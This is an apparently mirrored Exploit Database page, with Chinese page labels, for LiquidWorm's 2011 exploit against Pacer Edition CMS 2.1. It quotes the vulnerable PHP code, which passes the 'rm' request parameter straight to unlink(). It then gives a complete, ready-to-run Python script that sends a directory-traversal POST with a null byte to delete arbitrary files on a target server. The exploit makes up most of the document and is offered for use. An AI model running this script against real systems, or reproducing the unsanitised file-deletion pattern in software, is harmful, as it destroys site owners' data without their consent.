Pacer Edition CMS 2.1 – ‘rm’ Arbitrary File Deletion

• Exploit Database
• 12 阅读

• 作者： LiquidWorm
  日期： 2011-06-10
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/17378/

• #!/usr/bin/python
  #
  #
  # Pacer Edition CMS 2.1 (rm) Remote Arbitrary File Deletion Exploit
  #
  #
  # Vendor: The Pacer Edition
  # Product web page: http://www.thepaceredition.com
  # Affected version: RC 2.1 (SVN: 867)
  #
  # Summary: The 'Pacer Edition' is a Content Management System(CMS)
  # written using PHP 5.2.9 as a minimum requirement. The Pacer Edition
  # CMS was based from Website baker core and has been completely
  # redesigned with a whole new look and feel along with many new
  # advanced features to allow you to build sites exactly how you want
  # and make them, 100% yours!
  #
  # Desc: Input passed to the 'rm' parameter in modules/code/syntax_check.php
  # is not properly sanitised before being used to delete files. This can
  # be exploited to delete files with the permissions of the web server via
  # directory traversal sequences passed within the 'rm' parameter.
  #
  #
  # /modules/code/syntax_check.php (line: 99-102):
  # ----------------------------------------------------------
  #
  # if (isset($_REQUEST['rm'])) {
  #	@unlink($_REQUEST['rm']);
  #	die();
  # }
  #
  # ----------------------------------------------------------
  #
  #
  # Tested on: Microsoft Windows XP Professional SP3 (EN)
  #Apache 2.2.14 (Win32)
  #PHP 5.3.1
  #MySQL 5.1.41
  #
  #
  # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
  # liquidworm gmail com
  # Zero Science Lab
  #
  #
  # Advisory ID: ZSL-2011-5017
  # Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5017.php
  #
  #
  #
  # 07.06.2011
  #
  
  
  import socket
  import sys
  
  print '\n-------------------------------------------------------------------'
  print '\n Pacer Edition CMS 2.1 (rm) Remote Arbitrary File Deletion Exploit'
  print '\n-------------------------------------------------------------------\n'
  
  if len(sys.argv) < 4:
  	print '\nUsage: ' + sys.argv[0] + ' <target> <port> <file>\n'
  	print 'Example: ' + sys.argv[0] + ' 192.168.16.101 80 naked.jpg\n'
  	sys.exit(0)
   
  host = sys.argv[1]
  port = int(sys.argv[2])
  file = sys.argv[3]
  
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  connect = s.connect((host, port))
  s.settimeout(10)
  answ = s.recv(1024)
  
  s.send('POST /modules/code/syntax_check.php?rm=..%2f..%2f..%2f..%2f..%2f..%2f' + file + '%00 HTTP/1.1\r\n'
   'Host: ' + host + '\r\n'
   'Connection: keep-alive\r\n'
   'Content-Length: 0\r\n'
   'Cache-Control: max-age=0\r\n'
   'Origin: null\r\n'
   'User-Agent: thricer\r\n'
   'Content-Type: multipart/form-data; boundary=----x\r\n'
   'Accept: text/html\r\n'
   'Accept-Language: en-US,en;q=0.8\r\n'
   'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'
   '\r\n\r\n')
  
  htcode = 'HTTP/1.1 200'
   
  if htcode not in answ[:len(htcode)]:
  	print '- Error deleting file!\n'
  	sys.exit(0)
  else: print '+ File ' + file + 'deleted!\n'
  
  s.close